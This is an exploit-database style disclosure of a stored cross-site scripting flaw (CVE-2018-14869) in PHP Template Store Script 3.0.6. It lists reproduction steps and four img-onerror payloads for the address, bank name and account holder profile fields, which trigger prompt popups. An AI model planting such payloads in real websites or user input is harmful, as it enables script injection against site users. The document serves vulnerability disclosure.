*******************************************************************************************# Exploit Title:PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name # Date: 02.08.2018# Site Titel : Exclusive Scripts# Vendor Homepage:https://www.phpscriptsmall.com/# Software Link: http://www.exclusivescript.com/# Category: Web Application# Version: 3.0.6# Exploit Author: Sarafraz Khan# Contact: https://www.facebook.com/sarfraj.khan.79# Web:https://goglequeens.com# Tested on: Windows 10 -Firefox# CVE-2018-14869*****************************************************************************************
Proof of Concept:---------------------------1. Goto thesite ( http://www.server.com/).2- Click on => Login => Register =>and then fill the Form and click on Register Now
3-Goto your mail and Verify it.4-Now come back to site and Sign inusing yourVerified mail and Password.5-Goto Setting => Personal informationand paste these code in
Address line 1=> "><img src=x onerror=prompt(/SARAFRAZ/)>
Address Line 2=>"><img src=x onerror=prompt(/KHAN/)>
Bank name=>"><img src=x onerror=prompt(/KING/)>
A/C Holder name => "><img src=x onerror=prompt(/GOOGLEQUEENS/)>and then click on Update Profile.6-Now You will having popup of /SARAFRAZ/,/KHAN/,/ KING/and/GOOGLEQUEENS/in you account..***************************************************************************************
